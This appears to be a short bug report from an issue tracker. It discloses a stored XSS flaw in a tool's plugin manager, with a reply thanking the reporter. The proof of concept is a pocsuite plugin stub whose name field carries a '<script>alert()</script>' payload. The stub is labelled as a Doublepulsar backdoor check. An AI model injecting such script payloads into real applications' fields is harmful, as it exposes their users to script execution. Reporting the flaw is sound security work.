XSS Stored on Plugins

[mthbernardes]

There is a XSS stored on plugin management, when you upload a plugin with a tag script on it (I tested on plugin name), the app evals the tag when you click on Plugin Info button

#!/usr/bin/python
# -*- coding: utf-8 -*-

import binascii
import socket

from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import url2ip

class TestPOC(POCBase):
    name = "Doublepulsar<script>alert()</script>"
    vulID = ''
    author = ['seebug']
    vulType = 'Buffer Overflow'
    version = '1.0'
    references = ['http://paper.seebug.org/279/']
    desc = '''Doublepulsar backdoor'''

[jeffzh3ng]

Thank you for your contribution!